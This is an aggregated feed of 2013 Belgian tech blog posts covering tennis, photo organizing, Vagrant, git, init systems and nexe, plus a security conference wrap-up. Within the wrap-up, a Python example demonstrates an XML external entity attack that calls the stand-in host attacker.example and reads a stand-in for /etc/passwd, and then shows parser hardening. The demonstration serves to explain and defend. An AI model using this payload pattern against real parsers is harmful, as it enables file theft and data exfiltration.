May 19, 2013
Wouter Verhelst
Whee
Today, I played at TC Cantincrode in Mortsel, Belgium, in the first round. This is the first year I'm playing tennis competitively, so I was expecting to lose by a pretty wide margin. Now while I didn't win, the margin wasn't as wide as I'd expected; 6/4 - 6/3 isn't too bad for the non-ranked beginner that I am. For comparison: I lost my previous match with 6/2 - 6/0, and I was not unhappy about that.
Part of this was due to my opponent (by his own admission) not playing his best; but still, I'm quite happy about my result here.
My next match probably won't be as good. Oh well.
Frank Goossens
Does Facebook want its chat back?
I’m pretty pissed. A couple of months ago I configured Thunderbird to connect to Facebook’s XMPP-powered chat. I did get logged out sometimes, with mails from Facebook saying someone tried to access my account from an unknown location. Given the origin IP-address mentioned (in the private 10.x.x.x-range), this looked like a Facebook-internal problem (between their XMPP & Authentication servers).
Things have however taken a turn for the worse now; I’m not only getting logged out from Facebook on my 3 devices (work Win XP PC, home Ubuntu netbook & Android smartphone), I’m now even getting locked out of my account altogether, having to change my password on my smartphone (as that one has the OTP generator in the Facebook app). This happened 4 times in the last week and it is that frustrating that I disabled Facebook Chat in Thunderbird. And maybe that’s just what Facebook is aiming for; encouraging users to use Facebook Chat in a Facebook-owned/ -controlled context instead of in a neutral, ad-free 3rd party application? Wankers!
May 18, 2013
Thomas Vander Stichele
Organizing photo libraries
The weather’s picking up so it’s time for spring cleaning around the house. When I moved back to Barcelona three years ago I took with me my old analogue photos and negatives, with the idea of sorting through them at some point and getting them digitized. And while I’m at it, maybe it’s time to pull all my various folders of photos together too and organize them.
Well, I finally started. I grouped the negatives, labeled them by year, put them in individual envelopes, and handed them off to a professional lab to scan them after doing a quick test run on one set (which turned out great, but it’s *really* annoying me that they scan to JPEG by default, charge 40% extra for TIFF, and use a non-multiple-of-8 resolution to scan at which means I can’t losslessly rotate the negatives. Yes, I’m anal.)
So now I pulled together all my various folders of photos, and before I start doing tagging and stuff like that, I want to organize them in a decent folder layout. Googling for ideas pretty much suggests that the way to go is
YYYY/MM/DD
with possibly some description together with the DD
I’m not really happy about that, however, because there are certain things I’d like to be able to do:
- easily see where photos come from – did I make them ? did I get them from someone ? Did I download them from Facebook ?
- Are these original files from a camera without editing ?
- Are these the original scans ? From negatives ? From actual photos ? Or are they retouched, rotated, denoised, …
- Are these photos SFW ? Can I point my media center slideshow to this directory and have it safely show any photos under it ? (What do you mean, you’ve never snowboarded at night in only your underwear, and mooning the photographer ?) Or maybe not even SFW, but simply watchable and reasonable quality or subject material?
I realize some of these issues can not be resolved simply with a directory layout. But I’m sure some of you must have had similar issues or come up with a slightly better layout ?
Point me in the right direction please.
May 17, 2013
Xavier Mertens
NoSuchCon #1 Wrap-Up

There are so many security conferences around the world… Some people have already debated this: is it better to restrict the annual agenda to well-known events or to let people start their own? IMHO, we need initiatives like this. It's good to have a broad agenda with local conferences that local people can attend without spending huge amounts of money on travel and lodging (if you can't go to conferences, let's bring the conferences to you!). So, let's welcome the newly born conference called "NoSuchCon". The first edition was just organized in Paris over the last three days. Unfortunately, I was only able to attend the last day… If only I could expand my holidays like a filesystem!
I arrived in Paris early in the morning to attend the first keynote. Here is a quick review of the day.
Today's keynote was presented by Dmitri Alperovitch (from Crowdstrike). His presentation had only… one slide, displayed at the end of his keynote! The first message broadcast by Dmitri was "We are doing it wrong!". Is that really breaking news? No: major vendors, browsers, mobile phones, all of them are working to improve their security. We also have next-generation firewalls, powerful forensic tools, and the media are talking about "cyber-*" (replace the star with your favourite term) and are trying to do some awareness. So what?

This is a paradox! Even with all those changes, we are still unable to block our adversaries. Our desire to have a "one-size-fits-all" security solution is bad. We have very specific issues to address. One category of actors is hacktivists. Another one is espionage. Classic defensive approaches do not work against those actors. Offense is more lucrative and cheaper. If you increase your defences, the offensive guys will grow too. This is a never-ending story. A good example is DDoS: increasing your pipe to the Internet (bandwidth) and your server farms will not solve the problem, attackers will just use bigger botnets! Also, how do you defend against national agencies with huge budgets? Know your enemy; this will allow you to break the asymmetry between attack and defense. Find the pressure point and push on it. Attackers usually focus on a target and don't look at its competitor. An idea proposed by Dmitri: could a "bounty hunter" program law help to catch attackers? Dmitri brought a big suitcase full of t-shirts and distributed them after his keynote. That's for the show, but it's always fun to get goodies!
The first half-day was dedicated to presentations about the Windows kernel. The first one was given by Aaron LeMasters: "Crashdmp-ster diving the Windows 8 crash dump stack". The Microsoft crash dump mechanism is an interesting component of the operating system, and Aaron has done some research on this feature. His project is hosted on crashd.md.

The crash dump mechanism is a layered driver providing an I/O path to a mass storage device. It is used in two situations: when a bug check occurs (hey, it's Windows!) or to hibernate the system (crashdmp.sys). Aaron described how it works. Note that the mechanism differs between Windows XP through 7 and Windows 8. With the latest version of the Microsoft OS, the crash dump subsystem can be tricked into reading and writing everywhere; that's what Aaron explained during his talk. Based on his research, he also wrote a CTF challenge for SOURCE Boston and explained in detail how it worked. The source code will be released soon; check out his website.
Then a second talk immediately followed: "Exploiting hard core pool corruption in Microsoft Windows kernel" by Nikita Tarakanov. Today, many applications implement sandboxes (e.g. browsers). To escape a sandbox, a good idea is to abuse… the low level… the kernel.

Once the kernel is broken, you have access to everything. Previous vulnerabilities found in Windows kernels were memory corruptions. Today, the known techniques no longer work on Windows 8. First, Nikita reviewed how the kernel pool works and what the "old" attacks were. The next part covered a new attack which works on all versions of Windows: DKOHM ("Direct Kernel Object Header Manipulation").
After a lunch break in a small Parisian restaurant, eating and talking about security, the second set of talks started. The first one was "XML – Out-of-band exploitation" by Yunusov Timur and Alexey Osipov. The first part was about parameter entities ("PE"); the speakers reviewed them and how they work. How do out-of-band attacks work? The attacker sends XML to the server, which parses it and requests data from the malicious host.

They also demonstrated exfiltrating data via an XML file: using the DNS requests made during the XSLT transformation of an XML document to extract information through a bunch of A queries for forged names. Another demo grabbed /etc/passwd from a website just by trying to validate an XML file. Sweet!
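To make the two halves of that talk concrete, here is an added example (mine, not the speakers' demo code) using Python's expat-backed xml.sax parser. The "secret" file standing in for /etc/passwd and the attacker host attacker.example are constructed for the example. It shows the in-band leak (an external entity that reads a local file into the document text) and the out-of-band signal (an external entity whose mere resolution makes the parser contact the attacker's host, which is what a DNS or HTTP log on that host would reveal even if the application never echoes the document back). The same document is parsed with external entity resolution switched on (vulnerable) and off (the hardened default):

```python
"""Added example: what a parser that resolves external entities leaks.

Python's xml.sax (expat) is used here.  The secret file and the attacker
host are constructed for the demonstration.
"""
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

ATTACKER_URL = "http://attacker.example/probe"  # hypothetical collaborator host


def write_constructed_secret():
    """Create a stand-in for /etc/passwd holding one constructed line."""
    tmp = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    tmp.write("root:x:0:0:root:/root:/bin/bash\n")
    tmp.close()
    return tmp.name


def build_document(secret_path):
    """The document an attacker submits: 'probe' only has to be resolved to
    make the parser call out (out-of-band signal); 'file' pulls a local file
    into the document text (in-band leak)."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY probe SYSTEM "{ATTACKER_URL}">
  <!ENTITY file SYSTEM "{secret_path}">
]>
<data>&probe;&file;</data>""".encode()


class TextCollector(ContentHandler):
    """Collects character data, i.e. what the application would store or echo."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


class LoggingResolver(EntityResolver):
    """Records every external system id the parser tries to fetch.

    Remote URLs are answered with an empty entity instead of a network
    fetch, so the example runs offline; the 'requested' list plays the
    role of the attacker's server log.  Local paths are really read,
    which is exactly the leak."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = InputSource(systemId)
        if systemId.startswith(("http://", "https://", "ftp://")):
            src.setByteStream(BytesIO(b""))
        else:
            with open(systemId, "rb") as fh:
                src.setByteStream(BytesIO(fh.read()))
        return src


def parse_document(xml_bytes, allow_external_entities):
    """Parse with or without external general entity resolution.

    Returns (text seen by the application, list of external ids fetched).
    allow_external_entities=True is the vulnerable configuration; False,
    the xml.sax default, is the hardened one."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    collector = TextCollector()
    resolver = LoggingResolver()
    parser.setContentHandler(collector)
    parser.setEntityResolver(resolver)
    parser.parse(BytesIO(xml_bytes))
    return "".join(collector.chunks), resolver.requested


if __name__ == "__main__":
    secret = write_constructed_secret()
    doc = build_document(secret)
    for enabled in (True, False):
        text, fetched = parse_document(doc, enabled)
        state = "ON " if enabled else "OFF"
        print(f"external entities {state}: fetched={fetched} text={text.strip()!r}")
```

With resolution on, the attacker's host appears in the fetch log before any content is returned, and the secret line ends up in the parsed text; with resolution off, neither happens. The out-of-band variant matters precisely in the blind case: when the application never shows the parsed text, the callout is the only signal the attacker gets, so the check to run against your own parsers is whether a document like this one produces any outbound lookup at all.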
The next talk was again about kernels, but this time Mac OS X! Pedro Vilaca presented "Revisiting Mac OS X kernel rootkits". Rootkits are kernel extensions, and Pedro reviewed interesting ideas to make them more powerful. The Mac OS landscape has fewer researchers and lacks public developments about rootkits, but that does not mean none are active in the wild. Great job by Pedro, but difficult to maintain due to the operating system being closed source.
After a coffee break, the last round of talks started. Luigi Auriemma & Donato Ferrante presented "Exploiting game engines for fun & profit".

Why target games? Because the attack surface is huge! Did you know that some engines are sold under special licenses to military organisations? Almost everyone plays once back at home; even C-level people can be gamers in their free time, which can be a nice way into their company. The same engine can be shared across multiple games (with stuff added like Lego blocks), so the same vulnerability can be reused: a gain of time and $$$. Game engines can be attacked on four fronts:
- Fragmented packets: games are based on UDP, but they try to implement TCP-over-UDP. When fragmentation occurs, the engine must rebuild the original packet, and this reassembly is performed in memory. What about trying to place the payload of a packet in another memory area?
- Compression: not the algorithms but the index numbers. Flipping bits can be interesting.
- Game Protocols:
- Customization (extensions also called “mods” and command line)
After the theory, the speakers performed some live demos. Check out revuln.com for their white paper, released today!
For the next talk, the schedule changed: the scheduled speaker was not able to come to France due to a visa issue. Weird! A last-minute (but excellent!) speaker replaced him: Sergey Bratus presented "Any input is a program". I was lost, his topic was too complex! I don't know how many people in the audience were able to follow him.

The last talk was "Killing rats with incident response process" by Robinson Delaugerre and Adrien Chevalier. The result of their research is a new framework called Arsenic, which will be released soon. The goal is to perform incident response in an easy way. They started the talk with some facts about incident handling and how complex it can be.

This process is based on three pillars:
- Network analysis
- Host forensics
- Reverse engineering
Arsenic is their framework, written in Ruby, which brings those pillars together. They also performed live demos detecting a well-known RAT (Poison Ivy). It seems to be an interesting tool.
And that's already it. That was a quick but interesting visit to this new event. Again, NoSuchCon, welcome to the world of security conferences! The organizers made it a success with 250 attendees (number received from a member of the organisation). I particularly liked:
- The idea of a "one-day" pass for people who were not able to block three consecutive days.
- Slides were available a few minutes before each talk (useful for people sitting far from the projector).
- The conference Facedancer badge (made by Travis Goodspeed)
- Live streaming
Lionel Dricot
The Fight for E-Clothing
I meet Karl Isrich in a small restaurant. You may have heard about the company he founded, MyVirtualTaylor, a pioneer of e-clothing. You would probably imagine Karl as one of those twenty-something golden boys. Instead, I face an average, anxious guy of approximately forty, with greyish hair.
He asked me to go to this cheap restaurant because he could not afford a more expensive dinner. Lawyers, he said. When we sat down, he gave me a business card that used to be shiny six months ago. It simply says “MyVirtualTaylor, Isrich CEO”.
Hello Karl, thanks for the meeting. MyVirtualTaylor is an e-clothing company. But what is e-clothing exactly ?
Simply put, it’s 3D printing for clothes. We have developed a clothing printer that we sell and which is the size of a washing machine. Not being bigger than a washing machine was one of our top requirements before the launch.
The clothing printer has a tank of polymer, that you need to refill regularly, and seven dye tanks. We discovered that having seven primary colors was a good deal to reproduce most of the colors.
Through wifi, you send a .clo file to the printer then wait between ten minutes and one hour, depending on the size and the complexity of the model. Everything is automatic, you can even print a bunch of .clo in a row.
How do you get a .clo file?
We have an online editor on our website that allows you to design your own clothes. We have also some standard templates: shirts, ties, stuff like that.
In fact, when we launched, we didn't really think about that. We thought that there would be a new market for clothes creators. That's why we wanted the .clo format to be open and documented. We sell the hardware, but we didn't want to enter the clothing market.
Can you really print anything? What are the limitations?
Currently, there are some constraints with the size. We have prototypes that can print as big as a king size bed sheet. But, of course, you can only print clothes made of polymer. No silk nor fabric.
Isn’t that a big limitation? After all, most of our clothes are made of fabric.
It should be noted that a lot of progress has been made with polymers. We can weave the polymer in a lot of different ways in order to have the properties we want.
But, most importantly, clothing material has always been about finding a compromise between style, comfort and durability, durability being the critical point for quality clothes. The clothes have to go through hundreds of washing cycles. Our solution was to remove durability from the equation.
Do you mean that printed clothes are not durable?
No, they aren't. But it is not the goal. Instead of cleaning them, you put them in the clothing printer and the polymer is cleaned, melted and ready to print new clothes.
Unfortunately, we still cannot extract the colors. The polymer is thus not perfect. We store the recycled polymer in a separate tank. When you print, you can allow the use of recycled polymer or not. It is good enough for every day but if you want a perfect white shirt for a wedding, you probably want the unused polymer.
The part of the polymer which is worn out goes with the waste to the sewers.
It sounds like an ecological disaster.
That’s exactly the rumor spread by our opponents.
But, while it is not perfect, you have to compare it with the traditional clothing industry. Clothes are usually made in huge factories in China, using harmful chemicals. Then, you have to take into account the transport, the storage, the shop. Not mentioning the gas needed to go to the shopping mall. To that, add the water and the soap used to wash the clothes. By contrast, we basically use electricity and release very little polymer. With time, we hope to be able to recycle more and more.
Did you talk about opponents?
You know, I'm an engineer. I never really cared about anything but the technological aspects. When the first clothing printers were sold, people immediately started to exchange .clo files. They took their own clothes and made .clo files to be able to reproduce them.
One day, I received a letter from the lawyers of the FCIAA, the Fashion & Clothing Industry Association of America. I had never heard of them before but, basically, they wanted me to stop my company because I was threatening their business.
I thought it was a joke. Really. At first I was like: ”Funny. It’s like the candle industry suing Edison for inventing the lightbulb”. But it’s not funny any more.
I can talk about this for hours. They are bad. Really bad. They are trying to destroy my life.
Can’t you let the lawyers handle that?
For the lawsuit, of course. But there's a lot more. I've been contacted by politicians. They say that I'm destroying the economy. If my product works, there will be no shops for clothes, hence no jobs. They asked me: "Do you know how many Americans are working in clothing shops?". I was accused of being unpatriotic. From nowhere, some new laws appeared saying that clothes should have a certification in order to save children from accidental suffocation.
From that point, it became immoral to print clothes. Last year, nobody ever thought about printing clothes and, now, it is worse than eating babies alive. There are even webshops where you can order "Not Printed" labelled t-shirts. I've been attacked personally, investors have turned their backs on me and, at the same time, I still need to pay expensive legal fees.
Isn't it true that it's a threat to the economy?
It is a tool for making life easier. Any invention which frees people from unnecessary labor seems to be a threat to the economy. But if our economy is threatened by inventions that make life better for everyone, it's the economy we need to change, not the inventions.
What will you do next?
I feel bitter. I’m an engineer with a new useful idea and everyone turns against me: big corporations, lawyers, politicians. Even random people in the street think that “It’s the guy destroying jobs and suffocating babies”. I’ve never signed up for that. I’ve never been into politics or anything like that. Now, I’m thinking about settling somewhere in Europe but I’m afraid that the hand of the FCIAA will follow me there.
Thanks Karl, I wish you the best.
Although, as a journalist, I know I should remain objective, I can't help but feel empathy for the guy. As I'm packing up, I notice his clothes for the first time. "So are those printed?" "Of course." "Very nice. It's impressive." He sighs, then tries to smile at me: "Thanks. If you are interested, you will find the .clo on the Pirate Bay." His smile feels sad, despairing. We shake hands and he slowly walks away while I stay there, helpless.
This post is part of the Letters from the Future collection and is dedicated to Brokep for announcing his political involvement during the writing of this text. Picture by Anna Banana.
Frank Goossens
Music from Our Tube: Modeselektor Essential Mix
BBC Radio 1 has a great series called the "Essential Mix". There are a lot of those on YouTube, and Modeselektor's is one of the truly great ones amongst them. Enjoy!

Watch this video on YouTube or on Easy Youtube.
Frederic Hornain
[Automation] Cloudforms – May/June 2013 – Belgium

Dear *,
Next week, I will do a presentation about Cloudforms (Hybrid cloud management solution) [1][2].
If your company or you are based in BeNeLux and are interested in this presentation, just let me know and I will try to arrange a meeting for you.
[1] https://www.redhat.com/solutions/
[2] http://www.redhat.com/products/cloud-computing/cloudforms/
BR
Frederic
May 16, 2013
Wim Coekaerts
ksplice and how it really helps with 0day stuff
Of course, for all our customers that use ksplice and enjoy the cool zero-downtime patching, they might not even have noticed if they ran ksplice in automated mode (as many do); others just had to issue one single, very simple command and they were done. No applications to bring down, no systems to reboot... and still safe, secure, patched, current.
Some more specifics on the ksplice blog here.
There's also time to release: the ksplice patch was available on Tuesday (5/14) while the RPM for the kernel was released on Thursday (5/16) by us and the other similar distributions. No hassle...
Dries Buytaert
Want more features in Drupal 8? Help fix bugs!
In Drupal core, we use issue thresholds to manage technical debt. Both critical (release-blocking) and major (non-release-blocking, high-impact issues) are considered. When we have more open issues than our thresholds, we do not commit new features.
Currently, we have 27 critical bugs, 41 critical tasks, 155 major bugs, and 149 major tasks. This is more than twice our current thresholds for critical issues, and about 50% more than our thresholds for major issues. We need your help to resolve these issues so that we can resume adding new features to Drupal 8. That would be a very exciting place to get to!
There are many ways to help, including not only programming but also updating these issues' summaries, testing the patches, and making sure the patches still apply. I encourage everyone to collaborate on major and critical issues, and to consider making them a focus at the DrupalCon Portland sprints.
Jochen Maes
Tribute To Mady
\\//,
A month ago I posted a small text for Mady. Mady was a friend that carried a huge burden.
She had Huntington's disease, an illness that takes away pretty much everything you have control of; you can read about the specifics of the disease on the page I linked to. I've been thinking a lot about what I can do to get more attention towards the disease. I can only do my small part and hope that others will too.
As of now I will work 1 day per year for the Huntington Liga and hopefully more people will do this. That day will be 10 June. Every year as of now. Why June 10th? Because it's her birthday.
Whatever money I earn that day will go to the Huntington Liga, whether I work 10, 12 or 5 hours.
I hope that will turn out to be Belgium's national Huntington's day, Mady would love that.
Finally, the 5 companies/individuals that donate the most to the Liga will get me one full day to work for them for free, just mail me the payment proof!
I hope I have to work at least 5 days for free this year.
LLAP!
Wouter Verhelst
Single-stepping init systems
The Linux init systems are a bit in flux at the moment. That is, they're in flux in Debian; outside Debian, most other distributions have stepped away from sysvinit and towards something else (systemd, openrc, or upstart). I've not been a proponent of any switch, though I understand the reasoning, and it probably makes sense for us to switch at some point. But yesterday, the fact that this customer's system was running sysvinit and not systemd or upstart saved me quite a bit.
There's a server. It has one quadcore processor. For reasons that I won't go into here, the customer wants an extra quadcore processor to be added to the system.
After having done so, I power on the system... only to see it power itself off at some point during boot. I did notice some kernel messages fly by just moments before the system would power itself off, but it was impossible for me to read them. So what did I do?
- Boot the system with init=/bin/bash,
- After having booted the system, go to /etc/rcS.d and manually run each and every one of the scripts there in turn. When the system powers off, I know what the problem is.
- Disable the init script that causes the problem, and boot the system normally.
That last bit is, obviously, a bit of an ugly workaround; the better way to fix this issue would have been to debug what the actual issue was, and implement a proper fix. However, I didn't have time for that (the fact that there was need for a second quadcore chip explains how much this system is in use), and the workaround was acceptable for the customer. It is not the first time that this ability to single-step the init system has saved me. The fact that sysvinit is so simplistic is what makes this possible, and I consider that one of its most important features.
Recently, I came into contact with a distribution that uses systemd as its init system (in casu, Arch Linux). I had made a mistake in configuration; I had installed and enabled a graphical login system, but had no xterm or similar available, and had done something else wrong through which I couldn't get a regular shell on the console anymore, either. To fix this, I tried doing something like the above (running with init=/bin/bash and single-stepping the init system), but found that doing so with systemd is nigh impossible. In the end, I knew what exactly the problem was and could disable automatically starting the login manager through removing a symlink, but it brought home the issue that debugging a similar issue when running systemd rather than sysvinit might be a lot harder to do.
We'll see what the future brings.
May 15, 2013
Mattias Geniar
Setting custom puppet facts from within your Vagrantfile
You may want to set custom puppet facts in your development environment by specifying them in your Vagrantfile, so you can have a unique fact per developer or identify your own environment. Here's a quick way to do that.
First: make sure you are running the latest version of facter (yum update facter); it should be at least version 1.7, as that version supports custom facts easily (check with 'facter --version').
$ facter --version
1.7.1
Before the Vagrantfile changes, your facter facts look like this. The solution is the :shell provisioner in the first few lines of the Vagrantfile.
$ facter | grep 'custom'
[empty]
Your Vagrantfile can now be modified to look like this, to set up custom facts.
Vagrant::Config.run do |config|
  # First: run a shell provisioner to set up the custom facts
  config.vm.provision :shell do |shell|
    shell_cmd = ""
    # Make sure the facts directory exists
    shell_cmd << "mkdir -p /etc/facter/facts.d/; "
    # Add one of these lines for every custom fact you want
    shell_cmd << "echo 'custom_fact1=the value of the fact' > /etc/facter/facts.d/custom_fact1.txt; "
    # Run the inline shell to create those facts
    shell.inline = shell_cmd
  end
  # Then: run puppet like you normally would
  config.vm.provision :puppet do |puppet|
    puppet.manifests_path = "manifests"
    puppet.manifest_file = "my_manifest.pp"
  end
end
After a 'vagrant provision', your facts will be updated.
$ facter | grep custom
custom_fact1=the value of the fact
And you can now use the $::custom_fact1 variable within your manifests/modules.
Update 16/5: as Dieter De Meyer pointed out, there's a more elegant solution using the puppet provisioner itself. The downside is that the facts are only available if you use 'vagrant provision' to start a Puppet run; if you run Puppet from within the virtual machine, these facts won't be present (see the Vagrant Helper Scripts for Puppet to speed up your Puppet deployments).
Vagrant::Config.run do |config|
  config.vm.define :test do |vmconfig|
    vmconfig.vm.provision :puppet do |puppet|
      puppet.manifests_path = "manifests"
      puppet.manifest_file = "test.pp"
      puppet.module_path = [ "../", "./modules" ]
      # Facts passed straight to the Puppet run started by 'vagrant provision'
      puppet.facter = {
        "custom_fact1" => "value1",
        "custom_fact2" => "value2"
      }
      puppet.options = "--verbose"
    end
  end
end
Thanks!
May 14, 2013
Lionel Dricot
The Makers of Rain and Shine
As every year, Nest'up keeps its promises, and the 2015 batch does not seem to break with tradition. Among the happy nominees, we met Géraldine and Fabien, initiators of the MeteoroLogic project.
"It's a fully autonomous module that anyone can print at home, provided they buy two or three components. It's also possible to order it from us already assembled for a modest sum. Power comes from wind-driven suction-cup sensors and small solar panels," says Fabien, showing us a cylindrical parallelepiped fresh out of his 3D printer.
A geographer and meteorologist by training, the young man admits to having always had a soft spot for electronics. "I built myself ever more sophisticated weather stations. But I had trouble getting hold of certain parts. 3D printing was a revelation and I decided to create my own station. I launched a Kickstarter project so that I could devote my summer to it rather than working in a fast-food restaurant. In exchange, I released the plans from my work into the public domain."
It was, in fact, following an article in the university newspaper entitled "Our students' projects" that Géraldine met Fabien. At that time, the future computer engineer was looking for a master's thesis topic in artificial intelligence.
"The idea came to me one day when I saw my Twitter feed fill up with laments about the rain while, outside the window of my student room, the sun was shining. Four minutes later, the downpour hit. Twitter had been faster than the clouds. I told myself we ought to be able to build a predictive model based on the location of weather tweets. But when I saw Fabien's project, I immediately imagined the potential of connecting these stations in a network, over the internet."
While the potential does seem interesting, the business model is less so: the plans are available for free, the software is open source and MeteoroLogic sells the weather stations at cost. Besides, individuals wanting a weather station in their garden are probably not legion. Fabien sets us straight.
"With the rise of home automation, it becomes very useful to have an ultra-personalised weather station connected to your wifi that gives you the exact temperature, wind and humidity and can predict a shower to within three minutes. It is possible to optimise ventilation periods in winter to minimise heat loss and, in summer, on the contrary, to reduce the need for air conditioning. Everything is automatic, and you can be alerted on your smartphone as soon as rain is coming so you can bring in the washing that is drying. We are going to set up partnerships with home-automation companies, which should provide us with an income."
But how could a single station make such precise forecasts? This is where Géraldine's thesis comes in.
"Imagine thousands of weather stations all over the country, connected to the Internet, with a GPS to know their precise location. Each station uses the information from the other stations to build a personalised model of the local weather. Technically, I used a neural network to build an adaptive model. Each weather station discovers its neighbours and obtains their data through a decentralised protocol inspired by BitTorrent. At the start, all information is worth the same: the weather station in China is a priori no more valuable than the neighbour's. But, little by little, the predictions are refined while taking local specifics into account. The station will learn that if it suddenly rains at the neighbour's, local rain never takes long, whereas the weather in China does not seem to have any influence. What's great is that we don't use the traditional meteorological models."
Each station therefore uses the others to refine its predictions. And the more stations there are, the more precise the predictions will be. But the predictions remain ultra-local.
"I am also working on a model to collect all this information and predict the weather at an arbitrary location, provided it is not too far from at least one station. This algorithm will not be open source, because the aim is to sell this global weather map to players such as newspapers, airports and businesses. But all the data is public; MeteoroLogic is not in a privileged position: we simply connect to this network of stations like anyone else. That's the beauty of the project: once the plans and the source code of the weather station are public, nothing can stop the explosion of this weather-web."
Will the result match professional forecasts? Will a few stations costing around a hundred euros manage to equal the satellites launched at great expense into geostationary orbit? Fabien and Géraldine hope so. Moreover, ESA, the European Space Agency, has already announced that it is following the two young entrepreneurs' results very closely.
Photo by Retromoderns
Tom Baeyens
The Case For Cases
Especially for people performing knowledge work, it means it becomes harder to sift through vast amounts of information sources and share the right information with the appropriate people. It's not only time-consuming, it's also risky. Tweets, Google+, Facebook, blogs and press articles are abundant and typically have a low signal-to-noise ratio. On top of that, employees have to keep track of what's happening in their CRM, document management and many other enterprise systems. This means a greater exposure to loads of data that becomes on average less relevant. Procrastination never had an easier job looking for susceptible victims.
A case management solution is a fancy term for a system to share and discuss important topics in a business environment. Its function is to bring people together on topics like, e.g., introducing a new sales strategy or an important customer that may cancel a big order. A case is the most efficient instrument to share related documents, links and tasks for topics like that. In other words, a case is a social collaboration space for a specific topic.
To some extent, the scope of a case could be compared with an email discussion thread. Before you bring it up, let me explain why that is a problem. Email is ubiquitous and serves its purpose as the least common denominator for communication. But email has major drawbacks when used as the tool for collaboration. First, you have to assume that people always hit Reply-All. Reading a conversation where some people answer inline, some answer on top and some at the bottom is a challenge to say the least. Searching for the latest version of an attachment in a conversation is hard and error-prone. Involving someone later in an email discussion is hopeless, as not everyone includes the whole discussion thread.
Don't get me wrong, I'm not saying cases should replace email threads. People will continue to leverage email as a unified inbox for the foreseeable future. But cases provide a much better structure for information that is currently buried in the emails themselves. I think we will see a shift towards email being the unified notification inbox and the content will be stored in dedicated systems like case management systems.
For organizations larger than 10 people, it's a matter of professionalism to equip employees with a case management system. It's the way to share relevant information in a chaotic world with loads of noise and only a bit of signal. People will be better informed and collaborating becomes simpler. These improvements in the internal organization already justify adopting a case management system. The bonus comes from collaborations with external business partners like prospects, clients and suppliers. The advantages are just the same in this situation, and on top of that you show a professional approach to doing business.
Regrettably, not all solutions use the term case for this concept. Some solutions call it a task and others invent a new name. But it should be clear that every organization deserves a solution for social collaboration, and case management is a crucial aspect of that.
Jan Vansteenkiste
Working with git submodules: tips ‘n tricks
Some people hate it, nobody loves it, but it’s a good way to split a codebase into different components/repositories.
I have been using submodules a LOT for puppet development (all those puppet modules…). Some people might propose alternatives (puppet-tree, librarian), but I’d rather stick with what I already know.
Dealing with submodules in git is mainly painful because the parent repository doesn’t really know/care what is inside the submodule. It only keeps track of the hash of the commit it links to. Another downside is that your submodules almost always end up in a detached HEAD state, and after checking out a branch you kind of forget which commit the parent repository is pointing at.
The following aliases can be put in your ~/.gitconfig file in the alias section:
git tags
Slightly different from the default git tag: uses sort to do a natural sort of version numbers. Note that your sort version must be new enough to support -V.
tags = !sh -c 'git tag | sort -V'
git update
Run in the root of the ‘parent’ repository
update = !sh -c 'git pull && git fetch --tags && git submodule update --recursive && git submodule foreach git tag -f parent-$(git describe --contains --all HEAD)'
- Pull from the remote
- Fetch remote tags
- Update submodules (recursive)
- Create a tag on each submodule called parent-BRANCH with BRANCH being the branch the current parent repository is on
git noparent
Removes the parent-* tags from all repositories (recursive).
noparent = !sh -c 'git tag -d $(git tag | grep ^parent ) && git submodule foreach git noparent'
- Remove all tags matching ^parent
- Do the same for each submodule (recursive)
git safepush
Remove parent tags, make sure we don’t create a merge commit and push.
safepush = !sh -c 'git noparent && git pull --rebase && git push && git push --tags'
- Remove parent tags, we don’t want to push them by accident
- Fetch remote changes and rebase
- Push push push!
git pushtags
Remove parent tags and push all the tags.
pushtags = !sh -c 'git noparent && git push --tags'
- Remove the parent tags we have set
- Push tags
Patrick Debois
Compiling a nodejs project as a single binary
Let's face it, if you write software it's often hard to distribute it: you have the runtime, the modules you depend on and your software itself. Sure, you can package all that, but packages often require you to have root privileges to install.
Therefore at times it's convenient to have a single file/binary distribution. Download the executable and run it. For Ruby projects you can convert things into a single jar using JRuby. A good example is the logstash project: download 1 file, run it and you're in business. But you'd still require the Java runtime to be installed. (thanks Apple, NOT).
This comes as an extra with the Go language, but I was looking for a similar thing for nodejs. The following documentation is the closest I could get (it works!):
Compiling plain javascript (no external modules)
Enter nexe a tool to compile nodejs projects to an executable binary.
The way it works is:
- it downloads the nodejs source of your choice
- it creates a single file nodejs source (using sardines)
- it monkey patches the nodejs code to include this single file in the binary (adding it to the lib/nexe.js directory)
Creating a binary is as simple as:
$ nexe -i myproject.js -o myproject.bin -r 0.10.3
Caveats:
- I had an issue with unicode chars that got converted: it uses uglify.js and this needs to be configured to leave them alone (Sardines Patch Unicode). This was necessary to get terminal.js to compile
- The next issue was to get socket.io-client to compile: the swfobject uses document and navigator objects, so this had to be fixed as well (Sardines Patch Document & Navigator)
Alternatives:
- Node-webkit to package nodejs apps that require UI interaction
- http://tidesdk.multipart.net/docs/user-dev/generated/ - seems similar but I could not really grasp it
- AppJS - http://appjs.org/#why - aims to create HTML5/Javascript native apps
- NPKG - https://github.com/wearefractal/npkg - old but interesting code
Embedding a native module (in the nodejs binary)
Many of these single-packaging tools suffer from the problem of handling native modules.
nexe doesn't handle native modules (yet).
But with a little persistence and creativity, this is what I did to add the pty.js native module directly to the nodejs binary:
$ tar -xzvf node-v0.8.21.tar.gz
$ cd node-v0.8.21
# Copy the native code in the src directory
# If there is a header file copy/adapt it too
$ cp ~/dev/terminal.js/node_modules/pty.js/src/unix/pty.cc src/node_pty.cc
# Correct the export name of the module
# Add the node_ prefix to the node_module name
# Last line should read - NODE_MODULE(node_pty, init)
# add node_pty to src/node_extensions.h (f.e. right after node_zlib)
# NODE_EXT_LIST_ITEM(node_pty)
# Copy the pty.js file
$ cp ~/dev/pty.js/lib/pty.js lib/pty.js
# Add the pty.js to the node.gyp
# Somewhere in the library list add pty.js
# Somewhere in the source list add node_pty.cc
# Adapt the namings/bindings in lib/pty.js
# 1) replace: var pty = require('../build/Release/pty.node');
# with: var binding = process.binding('pty');
# 2) replace all references to pty. to binding.
$ make clean
$ ./configure
$ make
